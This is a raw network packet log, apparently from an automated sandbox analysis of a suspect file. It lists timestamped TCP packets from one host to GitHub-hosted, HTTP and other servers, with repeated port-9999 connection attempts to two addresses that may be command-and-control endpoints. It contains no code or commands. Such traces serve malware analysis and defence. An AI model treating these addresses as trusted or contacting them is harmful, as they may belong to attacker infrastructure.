                                                                                                                                                Sep 29, 2022 14:49:46.437800884 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.437830925 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.437843084 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.437859058 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.437872887 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.437925100 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.437971115 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.438014984 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.438029051 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.438047886 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.438090086 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.438124895 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.438169956 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.438188076 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.438208103 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.438239098 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.438282013 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.438306093 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.438318014 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.438365936 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.438632011 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.438654900 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.438674927 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.438756943 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.438777924 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.438797951 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.438976049 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.439106941 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.439174891 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.439223051 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.439260006 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.439274073 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.439290047 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.439322948 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.439341068 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.439352989 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.439394951 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.439414978 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.439425945 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.439467907 CEST44349760185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.439523935 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.439593077 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.440776110 CEST49760443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:46.795298100 CEST4976280192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:46.812903881 CEST8049762172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.813348055 CEST4976280192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:46.813505888 CEST4976280192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:46.829982042 CEST8049762172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.856595039 CEST8049762172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.953331947 CEST4976280192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:47.030656099 CEST4976380192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:47.047374010 CEST8049763172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:47.047863007 CEST4976380192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:47.050504923 CEST4976380192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:47.067351103 CEST8049763172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:47.094239950 CEST8049763172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:47.187750101 CEST4976380192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:49.078531981 CEST497489999192.168.2.3200.119.204.12
                                                                                                                                                Sep 29, 2022 14:49:49.391014099 CEST497619999192.168.2.3200.87.164.69
                                                                                                                                                Sep 29, 2022 14:49:49.533334970 CEST497649999192.168.2.3200.87.164.69
                                                                                                                                                Sep 29, 2022 14:49:50.029800892 CEST4976580192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:50.046844006 CEST8049765172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:50.046991110 CEST4976580192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:50.047130108 CEST4976580192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:50.063950062 CEST8049765172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:50.090910912 CEST8049765172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:50.188333988 CEST4976580192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:50.605413914 CEST4976280192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:50.968118906 CEST4976580192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:52.358700037 CEST497669999192.168.2.3200.87.164.69
                                                                                                                                                Sep 29, 2022 14:49:52.688394070 CEST49673443192.168.2.3131.253.33.200
                                                                                                                                                Sep 29, 2022 14:49:54.208734035 CEST49767443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:49:54.208831072 CEST44349767140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.209002018 CEST49767443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:49:54.217255116 CEST49767443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:49:54.217288971 CEST44349767140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.257700920 CEST44349767140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.264102936 CEST49767443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:49:54.264132977 CEST44349767140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.481762886 CEST44349767140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.481875896 CEST44349767140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.481947899 CEST44349767140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.482016087 CEST49767443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:49:54.482053995 CEST49767443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:49:54.484718084 CEST49767443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:49:54.486099005 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.486169100 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.486335993 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.486743927 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.486771107 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.524247885 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.556938887 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.556974888 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.574917078 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.577708960 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.577771902 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.577795029 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.577827930 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.577857018 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.577914953 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.577950954 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.579752922 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.579787016 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.579924107 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.579947948 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.579998970 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.592498064 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.592550039 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.592752934 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.592752934 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.592788935 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.595803976 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.595844030 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.595978975 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.596010923 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.596035004 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.598043919 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.598092079 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.598174095 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.598201990 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.598247051 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.599792957 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.599826097 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.600007057 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.600037098 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.609287977 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.609333038 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.609515905 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.609544039 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.611013889 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.611051083 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.611175060 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.611202955 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.611244917 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.611473083 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.611510992 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.611573935 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.611591101 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.611608982 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.612763882 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.612797976 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.612934113 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.612960100 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.612986088 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.613663912 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.613692045 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.613770008 CEST44349768185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:54.613775969 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.613842010 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:54.614514112 CEST49768443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:55.336684942 CEST497699999192.168.2.3200.87.164.69
                                                                                                                                                Sep 29, 2022 14:49:56.234246969 CEST49770443192.168.2.3104.208.16.94
                                                                                                                                                Sep 29, 2022 14:49:56.234306097 CEST44349770104.208.16.94192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:56.234415054 CEST49770443192.168.2.3104.208.16.94
                                                                                                                                                Sep 29, 2022 14:49:56.237195015 CEST49770443192.168.2.3104.208.16.94
                                                                                                                                                Sep 29, 2022 14:49:56.237232924 CEST44349770104.208.16.94192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:56.652384043 CEST44349770104.208.16.94192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:56.652861118 CEST49770443192.168.2.3104.208.16.94
                                                                                                                                                Sep 29, 2022 14:49:56.652895927 CEST44349770104.208.16.94192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:56.653012991 CEST49770443192.168.2.3104.208.16.94
                                                                                                                                                Sep 29, 2022 14:49:56.739650011 CEST49770443192.168.2.3104.208.16.94
                                                                                                                                                Sep 29, 2022 14:49:56.739679098 CEST44349770104.208.16.94192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:56.740283012 CEST44349770104.208.16.94192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:56.891897917 CEST49770443192.168.2.3104.208.16.94
                                                                                                                                                Sep 29, 2022 14:49:57.042196989 CEST4977180192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:57.060467958 CEST8049771172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.060609102 CEST4977180192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:57.060719013 CEST4977180192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:57.078851938 CEST8049771172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.105653048 CEST8049771172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.266690016 CEST4977180192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:57.481518030 CEST49770443192.168.2.3104.208.16.94
                                                                                                                                                Sep 29, 2022 14:49:57.481590986 CEST44349770104.208.16.94192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.483773947 CEST49770443192.168.2.3104.208.16.94
                                                                                                                                                Sep 29, 2022 14:49:57.513710976 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.519232035 CEST4977380192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:57.520401955 CEST4977480192.168.2.3172.217.168.67
                                                                                                                                                Sep 29, 2022 14:49:57.537601948 CEST8049774172.217.168.67192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.537787914 CEST4977480192.168.2.3172.217.168.67
                                                                                                                                                Sep 29, 2022 14:49:57.537929058 CEST4977480192.168.2.3172.217.168.67
                                                                                                                                                Sep 29, 2022 14:49:57.554936886 CEST8049774172.217.168.67192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.555706024 CEST8049774172.217.168.67192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.555747032 CEST8049774172.217.168.67192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.555808067 CEST4977480192.168.2.3172.217.168.67
                                                                                                                                                Sep 29, 2022 14:49:57.580086946 CEST804977377.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.580199957 CEST4977380192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:57.580410957 CEST4977380192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:57.641099930 CEST804977377.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.648658037 CEST804977377.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.652299881 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.652437925 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.716372013 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.716450930 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.716469049 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.716487885 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.716506958 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.716526031 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.716542959 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.716567039 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.716584921 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.717636108 CEST49775443192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:57.717704058 CEST4434977577.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.717822075 CEST49775443192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:57.720462084 CEST49775443192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:57.720505953 CEST4434977577.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.746011972 CEST4977380192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:57.855050087 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.855094910 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.855117083 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.855137110 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.855155945 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.855173111 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.855190992 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.855209112 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.855227947 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.856988907 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.857094049 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.858341932 CEST4434977577.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.858442068 CEST49775443192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:57.858477116 CEST4434977577.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.858535051 CEST49775443192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:57.939660072 CEST49775443192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:57.939722061 CEST4434977577.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.940227032 CEST4434977577.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:57.966311932 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.966311932 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.966311932 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.966311932 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.966371059 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.966382027 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.966396093 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.966411114 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.966430902 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.966444969 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:57.992054939 CEST49775443192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:57.992100000 CEST4434977577.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:58.108437061 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:58.108493090 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:58.108520985 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:58.108603954 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:58.115767002 CEST4434977577.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:58.116092920 CEST49775443192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:58.116128922 CEST4434977577.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:58.117940903 CEST4434977577.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:58.117991924 CEST4434977577.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:58.118002892 CEST4434977577.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:58.118114948 CEST49775443192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:58.118136883 CEST4434977577.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:58.118161917 CEST49775443192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:58.118230104 CEST49775443192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:58.123301983 CEST4434977577.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:58.123440981 CEST49775443192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:58.128422022 CEST4434977577.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:58.128554106 CEST49775443192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:58.179658890 CEST4434977577.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:58.179752111 CEST49775443192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:58.179775953 CEST4434977577.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:58.179795980 CEST4434977577.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:58.179826021 CEST49775443192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:58.179862976 CEST49775443192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:58.179989100 CEST49775443192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:58.180011988 CEST4434977577.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:58.180028915 CEST49775443192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:49:58.180041075 CEST4434977577.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:58.374535084 CEST497769999192.168.2.3200.87.164.69
                                                                                                                                                Sep 29, 2022 14:49:58.384201050 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:58.384246111 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:58.384246111 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:58.384246111 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:58.384262085 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:58.384272099 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:58.384300947 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:58.384300947 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:58.384314060 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:58.384329081 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:58.424978018 CEST497699999192.168.2.3200.87.164.69
                                                                                                                                                Sep 29, 2022 14:49:58.522849083 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:58.522962093 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:58.524646044 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:58.524739981 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.019296885 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.019296885 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.019373894 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.019373894 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.019373894 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.019373894 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.019373894 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.019393921 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.019407034 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.019428968 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.157989025 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:59.158137083 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:59.158193111 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:59.159784079 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:59.159902096 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.631701946 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.631819010 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.631845951 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.631860971 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.631877899 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.631896019 CEST4977280192.168.2.354.242.4.101
